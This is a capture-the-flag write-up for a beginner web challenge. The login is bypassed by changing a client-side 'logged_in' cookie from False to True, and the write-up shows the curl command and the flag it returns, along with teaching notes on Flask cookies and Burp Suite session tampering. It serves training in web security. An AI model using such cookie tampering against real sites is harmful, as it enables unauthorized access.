# Logged In

## description
```
The Death Star budget has had dire impacts on the
funding of other business units. Their Human
Resources Portal looks extremely vulnerable. Hit the
link below and get us access to that site!

[Link](https://104.130.69.147/)

CTF2019-14
```

## hint
```
cookies
```

## author
Tim Farley

## write-up

This web-based challenge prompts the user with a login screen when navigating to the site at `https://104.130.69.147`.

We start by examining the document source code and the network traffic in the developer console as the page loads, but we don't find anything there.

We continue investigating in our browser's development console, checking the usual suspects: The console, the network.

When we arrive at storage we'll find something that looks interesting. The site has (without our consent!), created a cookie called `logged_in` with a value of `False`. Surely it can't be that easy?

It is. We update the cookie value to `True` and refresh the page to find our flag:

```
$ curl --cookie 'logged_in=True' http://104.130.69.147
<link rel="stylesheet" href="/static/style.css" type="text/css">

 
<div class="login">
<div class="login-screen">
<div class="app-title">
	<div class="login-form">
<div class="control-group">
	<label class="login-field-icon fui-user" for="login-name"></label>
	rax.io{1imp3rial_s3kret$}ctf
</div>
</div>
</div>
</div>
</div>
```

## notes

This was a simple challenge aimed to familiarize people with common uses of cookies to maintain login information. They won't likely be this straightforward in the real world, but the practice of storing authorization data on the local machine is very common. You'll note there was another cookie called `session` that was created by the Flask architecture and is capable of storing lots of useful information about your browsing experience.

### steps to reproduce

This was a simple Flask app hosted with gunicorn. The code, and a sample systemd service file, are included in the `src/` directory.

### taking it further

This is about as bare-bones as this type of challenge can come. You can expand upon it in many ways. A more advanced approach might include using tools like burpsuite to hack the `session` cookie.

### links

* https://pythonspot.com/login-authentication-with-flask/
* https://www.tutorialspoint.com/flask/flask_cookies.htm
* https://support.portswigger.net/customer/portal/articles/1964073-using-burp-to-hack-cookies-and-manipulate-sessions
* https://blog.miguelgrinberg.com/post/running-your-flask-application-over-https
